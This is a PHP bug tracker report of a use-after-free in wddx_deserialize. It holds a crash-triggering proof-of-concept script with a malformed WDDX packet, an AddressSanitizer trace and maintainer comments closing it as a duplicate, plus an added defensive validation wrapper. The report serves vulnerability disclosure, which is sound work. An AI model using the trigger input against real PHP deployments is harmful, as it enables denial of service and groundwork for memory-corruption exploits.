Sec Bug #73064 Use-After-Free in wddx_deserialize of wddx.c
Submitted: 2016-09-12 02:21 UTC Modified: 2017-02-13 01:22 UTC
From: stackexploit at gmail dot com Assigned: stas
Status: Duplicate Package: WDDX related
PHP Version: master-Git-2016-09-12 (snap) OS: Ubuntu
Private report: No CVE-ID:
 [2016-09-12 02:21 UTC] stackexploit at gmail dot com
Description:
------------
CREDIT
-----------------------
This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.


PHP VERSION
-----------------------
./sapi/cli/php --version
PHP 7.2.0-dev (cli) (built: Sep 11 2016 18:37:49) ( NTS )
Copyright (c) 1997-2016 The PHP Group
Zend Engine v3.1.0-dev, Copyright (c) 1998-2016 Zend Technologies


PROOF-OF-CONCEPT FILE
-----------------------
Posted in the "Test script" section.


STACKTRACE
-----------------------
Posted in the "Actual result" section.


VULNERABILITY DETAILS
-----------------------
A Use-After-Free vulnerability can be triggered in the function wddx_deserialize.
To reproduce this issue, please run export USE_ZEND_ALLOC=0 before executing the test script.

Test script:
---------------
<?php
    $xml = <<<XML
<?xml version='1.0'?>
    <wEdxPacket ver='1.0'><er/>
        <data>
            <struct>
                <recordset rowt='1' fieldNames='keliu'>
                <field name='keliu'>
                <var name='php_class_name<binary>'>
                    <string>lab</string>
                </var>
            </struct>
        </data>
    </jddxPacket>
XML;
    
    $array = wddx_deserialize($xml);
    var_dump($array);
?>

Expected result:
----------------
Exit quietly.

Actual result:
--------------
==47659==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000a4c0 at pc 0x000000ca6599 bp 0x7ffd3028b0e0 sp 0x7ffd3028b0d8
READ of size 4 at 0x60600000a4c0 thread T0
    #0 0xca6598 in zval_delref_p php-src/Zend/zend_types.h:834:9
    #1 0xca6598 in i_zval_ptr_dtor php-src/Zend/zend_variables.h:47
    #2 0xca6598 in _zval_ptr_dtor php-src/Zend/zend_execute_API.c:550
    #3 0xac1962 in wddx_stack_destroy php-src/ext/wddx/wddx.c:233:4
    #4 0xac1962 in php_wddx_deserialize_ex php-src/ext/wddx/wddx.c:1097
    #5 0xabad7a in zif_wddx_deserialize php-src/ext/wddx/wddx.c:1299:2
    #6 0xfdfb3d in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER php-src/Zend/zend_vm_execute.h:675:2
    #7 0xe75f4b in execute_ex php-src/Zend/zend_vm_execute.h:432:7
    #8 0xe76ec3 in zend_execute php-src/Zend/zend_vm_execute.h:474:2
    #9 0xd00e9e in zend_execute_scripts php-src/Zend/zend.c:1464:4
    #10 0xad4425 in php_execute_script php-src/main/main.c:2537:14
    #11 0x10fca26 in do_cli php-src/sapi/cli/php_cli.c:990:5
    #12 0x10f9f60 in main php-src/sapi/cli/php_cli.c:1378:18
    #13 0x7f540a3b382f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #14 0x449578 in _start (php-src/sapi/cli/php+0x449578)

0x60600000a4c0 is located 0 bytes inside of 56-byte region [0x60600000a4c0,0x60600000a4f8)
freed by thread T0 here:
    #0 0x4e9520 in __interceptor_cfree.localalias.0 (php-src/sapi/cli/php+0x4e9520)
    #1 0xbed9e6 in _efree_56 php-src/Zend/zend_alloc.c:2367:1
    #2 0xabad7a in zif_wddx_deserialize php-src/ext/wddx/wddx.c:1299:2
    #3 0xfdfb3d in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER php-src/Zend/zend_vm_execute.h:675:2

previously allocated by thread T0 here:
    #0 0x4e96a8 in __interceptor_malloc (php-src/sapi/cli/php+0x4e96a8)
    #1 0xbe92a1 in _emalloc_56 php-src/Zend/zend_alloc.c:2325:1

SUMMARY: AddressSanitizer: heap-use-after-free php-src/Zend/zend_types.h:834:9 in zval_delref_p
==47659==ABORTING
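
Added example, not part of the bug report or of the PHP project's code: a defence-in-depth wrapper that pre-validates a WDDX packet with libxml before handing it to wddx_deserialize(), so that untrusted packets which are not well-formed XML (like the test script above, with its mismatched wEdxPacket/jddxPacket tags, unclosed recordset and field elements, and a '<' inside an attribute value) never reach the extension's expat callbacks. The function names and the element allow-list are assumptions; this is a mitigation for untrusted input, not a replacement for the fix referenced under bug #72860.

```php
<?php
// Added example (not from the bug report). Rejects packets that are not
// well-formed XML or that use elements outside the WDDX vocabulary before
// wddx_deserialize() ever sees them. Function names are hypothetical.

function wddx_packet_is_sane(string $xml): bool
{
    // Element names defined by the WDDX 1.0 DTD (assumed list; extend if
    // your packets legitimately use something else).
    $allowed = ['wddxPacket', 'header', 'comment', 'data', 'null', 'boolean',
                'number', 'dateTime', 'string', 'char', 'array', 'struct',
                'var', 'recordset', 'field', 'binary'];

    // Collect libxml errors instead of emitting warnings; no network access
    // while parsing (LIBXML_NONET), no entity substitution.
    $prev = libxml_use_internal_errors(true);
    $doc  = new DOMDocument();
    $ok   = $doc->loadXML($xml, LIBXML_NONET);
    $errs = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    if (!$ok || $errs !== []) {
        return false;   // mismatched or unclosed tags, '<' in attribute, etc.
    }
    if ($doc->documentElement->nodeName !== 'wddxPacket') {
        return false;   // root must be the WDDX packet element
    }
    foreach ($doc->getElementsByTagName('*') as $el) {
        if (!in_array($el->nodeName, $allowed, true)) {
            return false;   // unknown element: not something we want parsed
        }
    }
    return true;
}

function safe_wddx_deserialize(string $xml)
{
    if (!function_exists('wddx_deserialize')) {
        throw new RuntimeException('wddx extension is not loaded');
    }
    if (!wddx_packet_is_sane($xml)) {
        throw new InvalidArgumentException('rejected malformed WDDX packet');
    }
    return wddx_deserialize($xml);
}
```

Running the test script's packet through safe_wddx_deserialize() raises InvalidArgumentException at the well-formedness check; a valid packet such as the output of wddx_serialize_value() passes through unchanged.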

 [2016-09-12 02:33 UTC] stas@php.net
-Status: Open +Status: Duplicate
 [2016-09-12 02:33 UTC] stas@php.net
Seems to be duplicate of bug #72860, fixed by https://gist.github.com/anonymous/4f730c88f90c15b0216e8651af525972
 [2016-09-16 09:25 UTC] stackexploit at gmail dot com
-Status: Duplicate +Status: Closed
 [2016-09-16 09:25 UTC] stackexploit at gmail dot com
Close this issue since bug #72860 (https://bugs.php.net/bug.php?id=72860) has been closed.

BTW, bug #72860 has been assigned CVE-2016-7413.
 [2016-09-18 02:11 UTC] stackexploit at gmail dot com
Could you please help make this issue accessible publicly?
 [2016-09-18 06:15 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2017-02-13 01:22 UTC] stas@php.net
-Status: Closed +Status: Duplicate
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Thu Aug 17 08:02:00 2017 UTC